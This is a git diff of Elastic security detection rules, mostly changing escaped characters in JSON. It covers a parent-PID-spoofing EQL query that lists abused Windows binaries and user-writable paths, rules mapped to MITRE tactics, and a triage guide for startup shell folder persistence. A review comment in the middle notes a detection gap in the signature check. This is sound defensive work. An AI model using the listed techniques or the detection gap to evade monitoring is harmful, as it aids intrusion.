a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_102.json b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_102.json index 4fbf1e96467..2bd7961bf6f 100644 --- a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_102.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid \u003e 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence 
by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid > 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", "references": [ "https://blog.didierstevens.com/2017/03/20/" ], @@ -100,7 +100,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_103.json b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_103.json
index cb3b6192e40..5819f7a1e32 100644
--- a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_103.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid \u003e 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence 
by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid > 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", "references": [ "https://blog.didierstevens.com/2017/03/20/" ], @@ -99,7 +99,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_104.json b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_104.json
index 8886fa18aaf..195311aab4a 100644
--- a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_104.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid \u003e 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence 
by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid > 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", "references": [ "https://blog.didierstevens.com/2017/03/20/" ], @@ -100,7 +100,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_105.json b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_105.json
index e836d04776a..69608eb0958 100644
--- a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_105.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid \u003e 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence 
by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid > 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", "references": [ "https://blog.didierstevens.com/2017/03/20/" ], @@ -101,7 +101,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
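Review bot: In the first sequence stage, the user-writable-path branch only treats a binary as untrusted when `process.code_signature.exists == false or process.code_signature.status : "errorBadDigest"`, so an executable under Users, ProgramData, Windows\Temp or Windows\Tasks whose signature fails for any other reason (an untrusted or revoked chain, if the endpoint reports such statuses) is only caught if it also matches the original_file_name list or the Microsoft.NET path. Because the second stage is joined back through `process.parent.Ext.real.pid` only when the first stage matched, that gap removes coverage rather than just adding noise. If the endpoint populates it, widening the condition to `(process.code_signature.exists == false or process.code_signature.trusted == false)` would cover every non-trusted signature state; otherwise enumerate the failure statuses the endpoint emits. This file is generated rule JSON, so the change belongs in the upstream rule source rather than in this hunk.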
@@ -123,7 +123,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_1.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_1.json
index 29c554456db..d88ff660472 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_1.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_2.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_2.json
index 1c5d4f31611..d20005c29c7 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_2.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_3.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_3.json
index da77435ed9c..988cceb9be7 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_3.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_4.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_4.json
index 02735569429..54257a1835c 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_4.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_5.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_5.json
index e0f0a60d734..2fca592136b 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_5.json
@@ -82,7 +82,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_6.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_6.json
index 4488d456529..e0a9f3f901a 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_6.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_7.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_7.json
index 72625b3e0e7..a9e1b8a1b21 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_7.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_104.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_104.json
index 15bfc9d17b7..ed5fd922977 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_104.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Startup Shell Folder Modification", - "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. 
Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
